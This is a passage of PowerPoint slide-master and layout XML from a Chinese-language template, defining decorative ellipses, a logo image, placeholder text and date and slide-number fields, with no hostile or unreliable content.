            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">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1800" b="1" strike="noStrike" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701" y="3221"/>
              <a:ext cx="3025" cy="3025"/>
            </a:xfrm>
            <a:prstGeom prst="ellips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1800" b="1" strike="noStrike" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="椭圆 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8886" y="1843"/>
              <a:ext cx="3022" cy="3025"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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1800" b="1" strike="noStrike" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="椭圆 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9231" y="943"/>
              <a:ext cx="520" cy="52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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="椭圆 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9321" y="6033"/>
              <a:ext cx="860" cy="86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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="椭圆 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3678" y="993"/>
              <a:ext cx="620" cy="6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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="椭圆 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5363" y="5916"/>
              <a:ext cx="682" cy="68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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="椭圆 28"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1823" y="2568"/>
              <a:ext cx="360" cy="36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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="椭圆 29"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1321" y="1203"/>
              <a:ext cx="145" cy="14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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="椭圆 30"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="488" y="2388"/>
              <a:ext cx="147" cy="14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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="椭圆 41"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3196" y="5811"/>
              <a:ext cx="622" cy="6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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="椭圆 42"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1591" y="4773"/>
              <a:ext cx="360" cy="3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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="椭圆 43"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="323" y="3916"/>
              <a:ext cx="147" cy="14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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="椭圆 44"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="711" y="5721"/>
              <a:ext cx="147" cy="14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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="椭圆 45"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="12663" y="3146"/>
              <a:ext cx="360" cy="3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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="椭圆 46"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="12848" y="1323"/>
              <a:ext cx="147" cy="14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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="椭圆 47"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13896" y="2768"/>
              <a:ext cx="147" cy="14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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="椭圆 48"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11373" y="5693"/>
              <a:ext cx="622" cy="62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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="椭圆 49"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="12541" y="4693"/>
              <a:ext cx="360" cy="36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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="椭圆 50"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="14158" y="4248"/>
              <a:ext cx="147" cy="14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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="椭圆 51"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13563" y="5591"/>
              <a:ext cx="202" cy="20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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2081" name="图片 3" descr="LOGO"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12541" y="390"/>
              <a:ext cx="3835" cy="1917"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162828" name="标题 162827"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464878" y="4677410"/>
            <a:ext cx="8535240" cy="588010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162830" name="日期占位符 162829"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320800" y="6248400"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" noProof="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162831" name="页脚占位符 162830"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="6248400"/>
            <a:ext cx="3862388" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="zh-CN" noProof="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162832" name="灯片编号占位符 162831"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145588" y="6248400"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" noProof="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" noProof="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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2" y="1709738"/>
            <a:ext cx="10516635"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1932" y="4589463"/>
            <a:ext cx="10516635"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1577073" y="1557338"/>
            <a:ext cx="4849231" cy="4319587"/>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624232" y="1557338"/>
            <a:ext cx="4849231" cy="4319587"/>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2024/9/1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1" y="365125"/>
            <a:ext cx="10516635"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891" y="1778438"/>
            <a:ext cx="4874054"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891" y="2665379"/>
            <a:ext cx="487405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7554" y="1778438"/>
            <a:ext cx="4898058"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7554" y="2665379"/>
            <a:ext cx="4898058"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2024/9/1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2024/9/1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2024/9/1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3932624"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5183698" y="987425"/>
            <a:ext cx="6172808"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839871" y="2057400"/>
            <a:ext cx="3932624"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fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:endParaRPr lang="zh-CN"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trike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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4165759"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5183698" y="457201"/>
            <a:ext cx="6172808"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871" y="2057400"/>
            <a:ext cx="416575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2024/9/1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lvl="0" fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>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Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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77138" y="260350"/>
            <a:ext cx="2496325" cy="561657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1488164" y="260350"/>
            <a:ext cx="7344260" cy="561657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表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl"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lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>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Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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chart" preserve="1">
  <p:cSld name="标题和图表">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图表占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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2858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932" y="1709738"/>
            <a:ext cx="10516635" cy="2852737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4500"/>
            </a:lvl1p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831932" y="4589463"/>
            <a:ext cx="10516635"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fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>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2024/9/1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1734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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1577073" y="1557338"/>
            <a:ext cx="4849231" cy="4319587"/>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内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6624232" y="1557338"/>
            <a:ext cx="4849231" cy="4319587"/>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2024/9/1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871" y="365125"/>
            <a:ext cx="10516635" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186891" y="1778438"/>
            <a:ext cx="4874054"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4" name="内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186891" y="2665379"/>
            <a:ext cx="4874054"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5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6257554" y="1778438"/>
            <a:ext cx="4898058"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fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6257554" y="2665379"/>
            <a:ext cx="4898058" cy="3524284"/>
          </a:xfrm>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2024/9/1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2024/9/1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2024/9/1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3932624"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5183698" y="987425"/>
            <a:ext cx="6172808"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839871" y="2057400"/>
            <a:ext cx="3932624"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lvl="0" fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>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871" y="457200"/>
            <a:ext cx="4165759"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5183698" y="457201"/>
            <a:ext cx="6172808"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fontAlgn="base"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839871" y="2057400"/>
            <a:ext cx="416575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2024/9/1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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout30.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slideLayout" Target="../slideLayouts/slideLayout2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标题 161800"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493838" y="436563"/>
            <a:ext cx="7702550" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
